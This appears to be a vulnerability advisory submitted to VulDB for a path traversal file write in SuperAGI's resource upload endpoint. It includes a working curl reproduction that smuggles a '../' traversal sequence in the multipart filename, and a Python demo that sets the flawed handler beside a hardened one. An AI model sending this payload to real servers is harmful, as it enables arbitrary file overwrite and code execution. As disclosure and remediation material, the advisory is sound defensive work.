| Title | SuperAGI up to c3c1982 Path Traversal (CWE-22) |
|---|
| Description | # Technical Details
An Arbitrary File Write vulnerability via Path Traversal exists in the `upload` function in `superagi/controllers/resources.py` of SuperAGI.
The application does not sanitize the `file.filename` attribute of the HTTP multipart upload before joining it with the base storage directory. The extension check is applied only to the `name` form field, not to the filename that is actually used for the on-disk path, so an attacker can pass the check with a benign `name` and write files to arbitrary locations on the server through a crafted `filename`.
# Vulnerable Code
File: superagi/controllers/resources.py (lines 71-77)
Method: upload
Why: The application performs an extension check on the `name` field of the form data, but constructs the file path using the unsanitized `file.filename` attribute. Path traversal sequences (e.g., `../../`) in `file.filename` are preserved, allowing writes outside the intended upload directory. In the default development environment, the endpoint lacks authentication enforcement.
# Reproduction
1. Ensure SuperAGI backend is running.
2. Send the following request with a path traversal payload in the filename:
curl -s -X POST "http://127.0.0.1:8001/resources/add/1" -F "name=legit_name.txt" -F "size=24" -F "type=text/plain" -F "file=@/tmp/payload.txt;filename=../../../../../../../../../../tmp/pwned_traversal.txt"
3. Verify file was written: docker exec -it superagi-backend cat /tmp/pwned_traversal.txt
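The defect described under "Why" and exercised by the curl reproduction above, as an added example that is not SuperAGI's code: a minimal stand-in for the upload handler that checks the extension on `name` but builds the path from `filename`, next to a hardened version that validates the real filename, drops any directory component, and confines the resolved path to the storage root. The allow-list, the function names and the `../outside/pwned.txt` payload are assumptions for the demo; everything runs offline in a temporary directory.

```python
"""Added example (not SuperAGI's code): the upload pattern described above,
reproduced with a traversal payload, beside a hardened version."""
import os
import tempfile

# Assumed extension allow-list for the demo; SuperAGI's real list is not shown here.
ALLOWED_EXTENSIONS = {".txt", ".pdf", ".csv", ".json"}


def _ext_ok(name: str) -> bool:
    """Case-insensitive extension allow-list check."""
    return os.path.splitext(name)[1].lower() in ALLOWED_EXTENSIONS


def vulnerable_save(storage_dir: str, name: str, filename: str, data: bytes) -> str:
    """Mirrors the described bug: the check runs on `name`, the write uses `filename`."""
    if not _ext_ok(name):
        raise ValueError("file type not allowed")
    # os.path.join keeps '..' components, so a crafted filename escapes storage_dir.
    path = os.path.join(storage_dir, filename)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def hardened_save(storage_dir: str, name: str, filename: str, data: bytes) -> str:
    """Checks the real filename, strips directory parts, and confines the path."""
    del name  # the display name is untrusted metadata and must never become a path
    base = os.path.basename(filename.replace("\\", "/"))
    if base in ("", ".", "..") or not _ext_ok(base):
        raise ValueError("file name rejected")
    root = os.path.realpath(storage_dir)
    path = os.path.realpath(os.path.join(root, base))
    # Containment check after realpath: defends against symlinks and prefix tricks
    # such as a sibling directory named "storage2".
    if os.path.commonpath([root, path]) != root:
        raise ValueError("path escapes storage directory")
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Runs both savers against a constructed traversal payload in a temp tree."""
    tmp = tempfile.mkdtemp()
    storage = os.path.join(tmp, "storage")
    os.makedirs(storage)
    root = os.path.realpath(storage)
    traversal = "../outside/pwned.txt"  # constructed payload, relative to storage
    out = {}

    # Vulnerable handler: passes the check on `name`, writes outside storage.
    written = vulnerable_save(storage, "legit_name.txt", traversal, b"pwned")
    out["vulnerable_escaped"] = (
        os.path.commonpath([root, os.path.realpath(written)]) != root
    )

    # Hardened handler: same payload lands inside storage as a plain basename.
    kept = hardened_save(storage, "legit_name.txt", traversal, b"pwned")
    out["hardened_inside"] = os.path.dirname(os.path.realpath(kept)) == root
    out["hardened_basename"] = os.path.basename(kept)

    # Hardened handler: a disallowed extension on the real filename is rejected
    # even though `name` would have passed.
    try:
        hardened_save(storage, "legit_name.txt", "../../evil.py", b"import os")
        out["hardened_rejects_bad_ext"] = False
    except ValueError:
        out["hardened_rejects_bad_ext"] = True
    return out


if __name__ == "__main__":
    print(demo())
```

The hardened variant keeps the basename rather than rejecting any filename with a directory component, which is the behaviour of common helpers such as Werkzeug's `secure_filename`; if the deployment prefers to refuse such uploads outright, replace the `basename` call with a check that `filename` contains no `/` or `\`. The `commonpath` check after `realpath` is redundant once the basename is taken, but it is cheap and protects the write if the sanitization step is later loosened.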
# Impact
- Arbitrary File Write: Attacker can write files to any location on the server filesystem.
- Remote Code Execution: By overwriting Python library files, startup scripts, or configuration files, the attacker can achieve RCE.
- The vulnerability is exploitable without authentication in the default development environment (CVSS severity: Critical).
|
|---|
| Source | ⚠️ https://gist.github.com/YLChen-007/300843c707435540ce0e23bff3e6173a |
|---|
| User | Eric-y (UID 95889) |
|---|
| Submitted | 2026-03-27 01:03 PM (24 days ago) |
|---|
| Moderation | 2026-04-19 06:13 PM (23 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 358250 [TransformerOptimus SuperAGI up to 0.0.14 Multipart Upload resources.py upload name directory traversal] |
|---|
| Points | 20 |
|---|